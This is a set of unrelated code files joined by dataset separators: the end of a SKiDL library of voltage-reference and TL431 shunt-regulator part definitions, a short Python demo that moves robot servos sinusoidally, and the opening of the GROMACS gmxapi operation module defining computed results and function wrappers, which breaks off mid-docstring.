    Part(name='LT6657AHMS8-2.5',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference vref',description='Precision voltage reference, 40V input, 10mA output, 3.0ppm/C drift, 5.0V output',ref_prefix='U',num_units=1,fplist=['MSOP*3x3mm*Pitch0.65mm*'],do_erc=True,aliases=['LT6657BHMS8-2.5', 'LT6657AHMS8-3', 'LT6657BHMS8-3', 'LT6657AHMS8-5', 'LT6657BHMS8-5'],pins=[
        Pin(num='1',name='DNC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PWRIN,do_erc=True),
        Pin(num='3',name='~SHDN',do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='DNC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='OUT',func=Pin.PWROUT,do_erc=True),
        Pin(num='7',name='DNC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='DNC',func=Pin.NOCONNECT,do_erc=True)]),
    Part(name='MAX6100',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference ldo',description='Low-dropout high current voltage reference, 4.500V, ±0.4% accuracy, SOT-23 package',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['MAX6101', 'MAX6102', 'MAX6103', 'MAX6104', 'MAX6105', 'MAX6106', 'MAX6107'],pins=[
        Pin(num='1',name='IN',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='OUT',func=Pin.PWROUT,do_erc=True),
        Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
    Part(name='MCP1525T-I/TO',dest=TEMPLATE,tool=SKIDL,keywords='Voltage Reference 4.096V',description='MCP1541, 4.096V Voltage Reference, TO-92',ref_prefix='U',num_units=1,fplist=['TO-92*'],do_erc=True,aliases=['MCP1541T-I/TO'],pins=[
        Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='VSS',func=Pin.PWRIN,do_erc=True)]),
    Part(name='MCP1525T-I/TT',dest=TEMPLATE,tool=SKIDL,keywords='Voltage Reference 4.096V',description='MCP1541, 4.096V Voltage Reference, SOT-23',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['MCP1541-I/TT'],pins=[
        Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='VSS',func=Pin.PWRIN,do_erc=True)]),
    Part(name='REF02AP',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 5V',description='5V ±10mV Precision Voltage Reference, PDIP-8',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,aliases=['REF02BP'],pins=[
        Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='8',name='NC',func=Pin.PWRIN,do_erc=True)]),
    Part(name='REF02AU',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 5V',description='5V ±10mV Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF02BU'],pins=[
        Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='8',name='NC',func=Pin.PWRIN,do_erc=True)]),
    Part(name='REF102AP',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 10V',description='10V ±2.5mV Precision Voltage Reference, PDIP-8',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,aliases=['REF102BP', 'REF102CP'],pins=[
        Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='8',name='NR',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='REF102AU',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 10V',description='10V ±2.5mV Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF102BU', 'REF102CU'],pins=[
        Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='8',name='NR',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='REF191',dest=TEMPLATE,tool=SKIDL,description='Precision voltage references 4.096V',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*', 'SOIC*3.9x4.9m*_Pitch1.27mm*', 'TSSOP*4.4x3mm*Pitch0.65mm*'],do_erc=True,aliases=['REF192', 'REF193', 'REF194', 'REF195', 'REF196', 'REF198'],pins=[
        Pin(num='1',name='TP',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PWRIN,do_erc=True),
        Pin(num='3',name='~Sleep~',do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='TP',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.OUTPUT,do_erc=True),
        Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
    Part(name='REF3012',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference',description='4.096V 50-ppm/°C Max, 50-μA, CMOS Voltage Reference in SOT-23-3',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['REF3020', 'REF3025', 'REF3030', 'REF3033', 'REF3040'],pins=[
        Pin(num='1',name='IN',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='OUT',func=Pin.PWROUT,do_erc=True),
        Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
    Part(name='REF3212AMDBVREP',dest=TEMPLATE,tool=SKIDL,keywords='Micropower Prevision Voltage Reference 4.096V',description='REF3240A, 4.096V 100μA Micropower Precision Voltage Reference, SOT-23-6',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['REF3220AMDBVREP', 'REF3225AMDBVREP', 'REF3230AMDBVREP', 'REF3233AMDBVREP', 'REF3240AMDBVREP'],pins=[
        Pin(num='1',name='GND_F',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='GND_S',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='ENABLE',do_erc=True),
        Pin(num='4',name='IN',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='OUT_S',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='OUT_F',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='REF5020AD',dest=TEMPLATE,tool=SKIDL,keywords='Low Noise Precision Voltage Reference 5V',description='5V 0.05% 10mA Low Noise Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF5025AD', 'REF5030AD', 'REF5040AD', 'REF5045AD', 'REF5050AD', 'REF5010AD', 'REF5020ID', 'REF5025ID', 'REF5030ID', 'REF5040ID', 'REF5045ID', 'REF5050ID', 'REF5010ID'],pins=[
        Pin(num='1',name='DNC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='Temp',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='Trim/NR',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='8',name='DNC',func=Pin.NOCONNECT,do_erc=True)]),
    Part(name='REF5020ADGK',dest=TEMPLATE,tool=SKIDL,keywords='Low Noise Precision Voltage Reference 5V',description='5V 0.05% 10mA Low Noise Precision Voltage Reference, MSOP-8',ref_prefix='U',num_units=1,fplist=['MSOP*3x3mm*Pitch0.65mm*'],do_erc=True,aliases=['REF5025ADGK', 'REF5030ADGK', 'REF5040ADGK', 'REF5045ADGK', 'REF5050ADGK', 'REF5010ADGK', 'REF5020IDGK', 'REF5025IDGK', 'REF5030IDGK', 'REF5040IDGK', 'REF5045IDGK', 'REF5050IDGK', 'REF5010IDGK'],pins=[
        Pin(num='1',name='DNC',func=Pin.PWRIN,do_erc=True),
        Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='Temp',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
        Pin(num='5',name='Trim/NR',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
        Pin(num='8',name='DNC',func=Pin.PWRIN,do_erc=True)]),
    Part(name='TL431D',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SO8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='7',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431DBV',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT-23*'],do_erc=True,pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='NC_SUBSTRATE',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='4',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431DBZ',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431DCK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SC-70',ref_prefix='D',num_units=1,fplist=['SC-70*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431KTP',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, TO-252',ref_prefix='D',num_units=1,fplist=['TO*252'],do_erc=True,pins=[
        Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431LP',dest=TEMPLATE,tool=SKIDL,keywords='diode device regulator shunt',description='Shunt Regulator, TO-92',ref_prefix='D',num_units=1,fplist=['TO*'],do_erc=True,pins=[
        Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431P',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, PDIP-8',ref_prefix='D',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431PK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-89',ref_prefix='D',num_units=1,fplist=['SOT*89*'],do_erc=True,pins=[
        Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431PS',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, MSOP-8',ref_prefix='D',num_units=1,fplist=['MSOP*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL431PW',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, TSSOP-8',ref_prefix='D',num_units=1,fplist=['TSSOP*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL432DBV',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT?23*'],do_erc=True,pins=[
        Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
        Pin(num='4',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='5',name='REF',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL432DBZ',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
        Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
    Part(name='TL432PK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-89',ref_prefix='D',num_units=1,fplist=['SOT*89*'],do_erc=True,pins=[
        Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
        Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
        Pin(num='3',name='REF',func=Pin.PASSIVE,do_erc=True)])])
| StarcoderdataPython |
1663629 | <filename>python/test_servo_angles.py
"""
Demo moving the end link back and forth sinusoidally
"""
import time
import numpy as np
import ui
from robot import Robot
# Uncomment the following for simulation
#from robot import SimulatedRobot as Robot
# Main loop: drive the three servo joints with a shared sinusoid until the
# UI window is closed. Per-joint amplitudes are scaled relative to A.
with Robot.connect() as r, ui.basic(r) as gui:
    while gui.open:
        now = time.time()
        frequency_hz = 0.5
        amplitude = np.radians(45)
        phase = np.sin(2 * np.pi * frequency_hz * now)
        r.servo_angle = phase * np.array([-0.5 * amplitude, 0.0, amplitude])
        time.sleep(0.01)  # ~100 Hz command rate
| StarcoderdataPython |
8057506 | #
# This file is part of the GROMACS molecular simulation package.
#
# Copyright (c) 2019, by the GROMACS development team, led by
# <NAME>, <NAME>, <NAME>, and <NAME>,
# and including many others, as listed in the AUTHORS file in the
# top-level source directory and at http://www.gromacs.org.
#
# GROMACS is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# GROMACS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with GROMACS; if not, see
# http://www.gnu.org/licenses, or write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# If you want to redistribute modifications to GROMACS, please
# consider that scientific software is very special. Version
# control is crucial - bugs must be traceable. We will be happy to
# consider code for inclusion in the official distribution, but
# derived work must not be called official GROMACS. Details are found
# in the README & COPYING files - if they are missing, get the
# official version at http://www.gromacs.org.
#
# To help us fund GROMACS development, we humbly ask that you cite
# the research papers on the package. Check out http://www.gromacs.org.
"""Define gmxapi-compliant Operations
Provide decorators and base classes to generate and validate gmxapi Operations.
Nodes in a work graph are created as instances of Operations. An Operation factory
accepts well-defined inputs as key word arguments. The object returned by such
a factory is a handle to the node in the work graph. It's ``output`` attribute
is a collection of the Operation's results.
function_wrapper(...) produces a wrapper that converts a function to an Operation
factory. The Operation is defined when the wrapper is called. The Operation is
instantiated when the factory is called. The function is executed when the Operation
instance is run.
The framework ensures that an Operation instance is executed no more than once.
"""
# Public API of this module (names exported by `from ... import *`).
__all__ = ['computed_result',
           'append_list',
           'concatenate_lists',
           'function_wrapper',
           'make_constant',
           ]
import collections
import functools
import inspect
import weakref
from contextlib import contextmanager
from gmxapi import exceptions
class ImmediateResult(object):
    """Data handle for a simple, eagerly computed result.

    Instances of this class can be used to provide a gmxapi compatible data
    handle for trivial operations. Operation and result are stateless and can
    be evaluated in any Context.

    Used internally to implement the computed_result factory. The interface
    for this class will evolve as the gmxapi data model evolves. Generally,
    code providing gmxapi data sources should use one of the factories or
    decorators provided in the gmxapi.operation module rather than
    instantiating from this class directly.
    """

    def __init__(self, implementation=None, input=None):
        """Wrap a callable for a simple data source that does not need Future behavior.

        Provides a gmxapi compatible interface for data sources.

        Arguments:
            implementation : Python callable that consumes ``input`` and returns data
            input : object compatible with the call signature of ``implementation``

        ``input`` must have an ``args`` attribute and a ``kwargs`` attribute to be used as

            implementation(*input.args, **input.kwargs)

        Callers should not assume when or how often ``implementation`` could be called.
        Only suitable for function objects without side effects.

        Raises:
            TypeError: if ``implementation`` is not callable, or if ``input``
                does not provide ``args`` and ``kwargs`` attributes.
        """
        # Validate with explicit exceptions rather than `assert`: assertions
        # are stripped when Python runs with optimizations enabled (-O), which
        # would silently skip this input validation.
        if not callable(implementation):
            raise TypeError('implementation must be a callable, got {!r}'.format(implementation))
        if not (hasattr(input, 'args') and hasattr(input, 'kwargs')):
            raise TypeError('input must provide "args" and "kwargs" attributes.')
        # Retain input information for introspection.
        self.__input = input
        # The wrapped callable is executed exactly once, at construction time;
        # `result()` only returns the cached value.
        self.__cached_value = implementation(*input.args, **input.kwargs)
        # TODO: (FR4) need a utility to resolve the base type of a value
        # that may be a proxy object.
        self._dtype = type(self.__cached_value)

    @property
    def dtype(self):
        """The data type of the return value for the wrapped function."""
        return self._dtype

    def result(self):
        """Return the cached value produced by the wrapped function."""
        return self.__cached_value
def computed_result(function):
    """Decorate a function so that calling it produces an object with Result behavior.

    The returned callable has the same signature as ``function``, but can also
    accept gmxapi data proxies, assuming the provided proxy objects represent
    types compatible with the original signature. Each call produces an
    ImmediateResult whose ``result()`` gives the value ``function`` would
    return when executed in the local context with the inputs fully resolved.

    The API does not specify when input data dependencies will be resolved or
    when the wrapped function will be executed. That is, ``@computed_result``
    functions may force immediate resolution of data dependencies and/or may
    be called more than once to satisfy dependent operation inputs.
    """

    @functools.wraps(function)
    def new_function(*args, **kwargs):
        # Map the caller's arguments onto the original call signature,
        # resolving any argument that behaves like a gmxapi Future/proxy
        # (i.e. that offers a `result()` method).
        # Note: introspection could fail.
        # TODO: Figure out what to do with exceptions where this introspection
        # and rebinding won't work.
        # ref: https://docs.python.org/3/library/inspect.html#introspecting-callables-with-the-signature-object
        # TODO: (FR3+) create a serializable data structure for inputs discovered
        # from function introspection.
        # TODO: (FR4) handle typed abstractions in input arguments
        signature = inspect.signature(function)

        def resolve(value):
            # Collapse a proxy to its concrete value; pass plain data through.
            return value.result() if hasattr(value, 'result') else value

        positional = [resolve(argument) for argument in args]
        keyword = {name: resolve(value) for name, value in kwargs.items()}
        input_pack = signature.bind(*positional, **keyword)
        return ImmediateResult(function, input_pack)

    return new_function
@computed_result
def append_list(a: list = (), b: list = ()):
    """Concatenate two list-like inputs into a single list.

    Non-iterable scalars are promoted to one-element lists. Strings and
    bytes are rejected explicitly because they would otherwise be iterated
    character-wise.
    """
    # TODO: (FR4) Returned list should be an NDArray.
    if isinstance(a, (str, bytes)) or isinstance(b, (str, bytes)):
        raise exceptions.ValueError('Input must be a pair of lists.')

    def coerce(value):
        # Promote a scalar to a single-element list; copy iterables.
        try:
            return list(value)
        except TypeError:
            return [value]

    return coerce(a) + coerce(b)
def concatenate_lists(sublists: list = ()):
    """Combine data sources into a single list.

    A trivial data flow restructuring operation, expressed as a recursive
    chain of ``append_list`` operations over the given sub-lists.
    """
    if isinstance(sublists, (str, bytes)):
        raise exceptions.ValueError('Input must be a list of lists.')
    if not len(sublists):
        return []
    head, tail = sublists[0], sublists[1:]
    return append_list(head, concatenate_lists(tail))
@computed_result
def make_constant(value):
    """Provide a predetermined value at run time.

    This is a trivial operation that provides a (typed) value, primarily for
    internal use to manage gmxapi data flow.

    Accepts a value of any type. The object returned has a definite type and
    provides the same interface as other gmxapi outputs. Additional
    constraints or guarantees on data type may appear in future versions.
    """
    # TODO: (FR4+) Manage type compatibility with gmxapi data interfaces.
    dtype = type(value)
    return dtype(value)
# In the longer term, Contexts could provide metaclasses that allow transformation or dispatching
# of the basic aspects of the operation protocols between Contexts or from a result handle into a
# new context, based on some attribute or behavior in the result handle.
# TODO: For outputs, distinguish between "results" and "events".
# Both are published to the resource manager in the same way, but the relationship
# with subscribers is potentially different.
def function_wrapper(output=None):
"""Generate a decorator for wrapped functions with signature manipulation.
New function accepts the same arguments, with additional arguments required by
the API.
The new function returns an object with an `output` attribute containing the named outputs.
Example:
@function_wrapper(output={'spam': str, 'foo': str})
def myfunc(parameter: str = None, output=None):
output.spam = parameter
output.foo = parameter + ' ' + parameter
operation1 = myfunc(parameter='spam spam')
assert operation1.output.spam.result() == 'spam spam'
assert operation1.output.foo.result() == 'spam spam spam spam'
"""
# TODO: more flexibility to capture return value by default?
# If 'output' is provided to the wrapper, a data structure will be passed to
# the wrapped functions with the named attributes so that the function can easily
# publish multiple named results. Otherwise, the `output` of the generated operation
# will just capture the return value of the wrapped function.
# For now, this behavior is obtained with @computed_result
# TODO: (FR5+) gmxapi operations need to allow a context-dependent way to generate an implementation with input.
# This function wrapper reproduces the wrapped function's kwargs, but does not allow chaining a
# dynamic `input` kwarg and does not dispatch according to a `context` kwarg. We should allow
# a default implementation and registration of alternate implementations. We don't have to do that
# with functools.singledispatch, but we could, if we add yet another layer to generate a wrapper
# that takes the context as the first argument. (`singledispatch` inspects the first argument rather
# that a named argument)
# Implementation note: The closure of the current function is used to
# dynamically define several classes that support the operation to be
# created by the returned decorator.
# Encapsulate the description of the input data flow.
PyFuncInput = collections.namedtuple('Input', ('args', 'kwargs', 'dependencies'))
# Encapsulate the description of a data output.
Output = collections.namedtuple('Output', ('name', 'dtype', 'done', 'data'))
class Publisher(object):
    """Data descriptor granting write access to one named output resource.

    For a wrapped function receiving an ``output`` argument, this descriptor
    implements the attribute of that name on the object passed as ``output``,
    forwarding reads and writes to the owning resource manager. One Publisher
    instance is installed per named output on the dynamically created
    PublishingDataProxy class.

    Ref: https://docs.python.org/3/reference/datamodel.html#implementing-descriptors

    Collaborations:
        Relies on implementation details of ResourceManager.
    """

    def __init__(self, name, dtype):
        self.name = name
        self.dtype = dtype

    def __get__(self, instance, owner):
        # Accessed on the owner class itself: return the descriptor object.
        if instance is None:
            return self
        manager = instance._instance
        return getattr(manager._data, self.name)

    def __set__(self, instance, value):
        # Publish the value through the proxied resource manager.
        instance._instance.set_result(self.name, value)

    def __repr__(self):
        return 'Publisher(name={}, dtype={})'.format(self.name, self.dtype.__qualname__)
class DataProxyBase(object):
    """Limited interface to managed resources.

    Subclass DataProxyBase to specialize an interface to an ``instance``.
    A derived class either omits ``__init__`` or forwards an instance of the
    proxied object to this initializer.

    The proxy keeps a strong reference to ``instance`` so the proxied object
    cannot be garbage collected while the proxy is alive.
    """

    def __init__(self, instance):
        self._instance = instance
# Dynamically define a type for the PublishingDataProxy using a descriptor for each attribute.
# `output` is the closure's mapping of output name -> declared type supplied to
# the wrapper; each name becomes a writable Publisher descriptor.
# TODO: Encapsulate this bit of script in a metaclass definition.
namespace = {}
for name, dtype in output.items():
    namespace[name] = Publisher(name, dtype)
namespace['__doc__'] = "Handler for write access to the `output` of an operation.\n\n" + \
                       "Acts as a sort of PublisherCollection."
PublishingDataProxy = type('PublishingDataProxy', (DataProxyBase,), namespace)
class ResultGetter(object):
    """Callable that localizes a single named result to the caller's Context.

    Invoking the getter forces the resource manager to bring its outputs up
    to date, then returns the concrete data for the named output.
    """

    def __init__(self, resource_manager, name, dtype):
        self.resource_manager = resource_manager
        self.name = name
        self.dtype = dtype

    def __call__(self):
        manager = self.resource_manager
        manager.update_output()
        assert manager._data[self.name].done
        # Hand ownership of the concrete data to the caller.
        return manager._data[self.name].data
class Future(object):
    """Deferred handle to a single named operation output.

    ``result()`` forces resolution of the data flow and returns the concrete
    value. Subscripting yields a narrower view whose ``result()`` indexes into
    this Future's resolved value.
    """

    def __init__(self, resource_manager, name, dtype):
        self.name = name
        if not isinstance(dtype, type):
            raise exceptions.ValueError('dtype argument must specify a type.')
        self.dtype = dtype
        # Resolution is delegated to a getter so a Future need not retain a
        # strong reference to the resource manager beyond this facility;
        # further Future interface can grow without coupling to the manager.
        self._result = ResultGetter(resource_manager, name, dtype)

    def result(self):
        return self._result()

    def __getitem__(self, item):
        """Get a more limited view on the Future."""
        # TODO: Strict definition of outputs and output types can let us validate this earlier.
        #  We need AssociativeArray and NDArray so that we can type the elements.
        #  Allowing a Future with None type is a hack.
        def result():
            return self.result()[item]
        return collections.namedtuple('Future', ('dtype', 'result'))(None, result)
class OutputDescriptor(object):
    """Read-only data descriptor for proxied output access.

    When read through an OutputDataProxy instance, asks the proxied resource
    manager for a Future of this named output.
    """

    def __init__(self, name, dtype):
        self.name = name
        self.dtype = dtype

    def __get__(self, proxy, owner):
        # Accessed on the owner class itself: return the descriptor object.
        if proxy is None:
            return self
        return proxy._instance.future(name=self.name, dtype=self.dtype)
class OutputDataProxy(DataProxyBase):
    """Handler for read access to the `output` member of an operation handle.

    Acts as a sort of ResultCollection.

    A ResourceManager creates an OutputDataProxy instance at initialization to
    provide the ``output`` property of an operation handle.
    """
    # TODO: Needs to know the output schema of the operation,
    #  so type definition is a detail of the operation definition.
    #  (Could be "templated" on Context type)
    # TODO: (FR3+) We probably want some other container behavior,
    #  in addition to the attributes...

# Attach one read-only OutputDescriptor per declared output name (from the
# wrapper's `output` specification in the enclosing closure).
for name, dtype in output.items():
    setattr(OutputDataProxy, name, OutputDescriptor(name, dtype))
class ResourceManager(object):
    """Provides data publication and subscription services.

    Owns the data published by the operation implementation or served to consumers.
    Mediates read and write access to the managed data streams.

    This ResourceManager implementation is defined in conjunction with a
    run-time definition of an Operation that wraps a Python callable (function).
    ResourceManager is instantiated with a reference to the callable.

    When the Operation is run, the resource manager prepares resources for the wrapped
    function. Inputs provided to the Operation factory are provided to the
    function as keyword arguments. The wrapped function publishes its output
    through the (additional) ``output`` key word argument. This argument is
    a short-lived resource, prepared by the ResourceManager, with writable
    attributes named in the call to function_wrapper().

    After the Operation has run and the outputs published, the data managed
    by the ResourceManager is marked "done."

    Protocols:
        The data() method produces a read-only collection of outputs named for
        the Operation when the Operation's ``output`` attribute is accessed.

        publishing_resources() can be called once during the ResourceManager lifetime
        to provide the ``output`` object for the wrapped function. (Used by update_output().)

        update_output() brings the managed output data up-to-date with the input
        when the Operation results are needed. If the Operation has not run, an
